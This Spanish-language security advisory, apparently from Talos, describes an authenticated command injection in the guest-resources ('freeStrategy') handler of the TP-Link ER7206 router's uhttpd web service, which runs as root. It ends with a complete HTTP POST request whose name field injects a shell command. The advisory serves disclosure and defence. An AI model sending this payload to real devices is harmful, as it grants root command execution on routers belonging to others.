
TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Vulnerabilidad de inyección de comandos
TP-Link ER7206 Omada Gigabit VPN Router vulnerabilidad de inyección de comandos en uhttpd freeStrategy
Existe una vulnerabilidad de ejecución de comandos en la funcionalidad de recursos de invitados del enrutador VPN Gigabit Omada TP-Link ER7206 versión 1.3.0 build 20230322 Rel.70591. Una solicitud HTTP especialmente diseñada puede provocar la ejecución de comandos arbitrarios. Un atacante puede realizar una solicitud HTTP autenticada para desencadenar esta vulnerabilidad.
Las siguientes versiones fueron probadas o verificadas como vulnerables por Talos o confirmadas como vulnerables por el proveedor.
Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591
ER7206 Omada Gigabit VPN Router - https://www.tp-link.com/us/business-networking/vpn-router/er7206/
El enrutador VPN Gigabit Omada ER7206 es una solución de red de alto rendimiento que admite conectividad Gigabit, VPN altamente segura e integración con Omada SDN para administración centralizada en la nube y aprovisionamiento sin intervención.
El enrutador VPN Gigabit Omada ER7206 ejecuta varios servicios para administrar el enrutador o los dispositivos conectados a él. Uno de esos servicios es uhttpd, que se ejecuta en el puerto 80/443. Proporciona a los usuarios una interfaz web para configurar y administrar el enrutador. De forma predeterminada, el servicio se ejecuta como usuario root. Un atacante puede obtener acceso root al dispositivo explotando este servicio.
Existe una vulnerabilidad de inyección de comandos en el servicio uhttpd cuando se agrega un recurso de invitado al dispositivo. En la interfaz web, la página de recursos de invitados se puede acceder navegando a Autenticación -> Configuración de autenticación -> Recursos de invitados. Contiene funciones para agregar, editar y eliminar recursos de invitados. Cuando se agrega un recurso de invitado, se activa la siguiente solicitud HTTP Post:
POST /cgi-bin/luci/;stok=b53d9dc12fe8aa66f4fdc273e6eaa534/admin/freeStrategy?form=strategy_list HTTP/1.1
Host: 192.168.8.100
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: sysauth=8701fa9dc1908978bc804e7d08931706
Content-Length: 470
data=%7B%22method%22%3A%22add%22%2C%22params%22%3A%7B%22index%22%3A0%2C%22old%22%3A%22add%22%2C%22new%22%3A%7B%22name%22%3A%22DDDDL|`/usr/bin/id>/tmp/had`%22%2C%22strategy_type%22%3A%22five_tuple%22%2C%22src_ipset%22%3A%22%2F%22%2C%22dst_ipset%22%3A%22%2F%22%2C%22mac%22%3A%22%22%2C%22sport%22%3A%22-%22%2C%22dport%22%3A%22-%22%2C%22service_type%22%3A%22TCP%22%2C%22zone%22%3A%22LAN1%22%2C%22comment%22%3A%22%22%2C%22enable%22%3A%22on%22%7D%2C%22key%22%3A%22add%22%7D%7D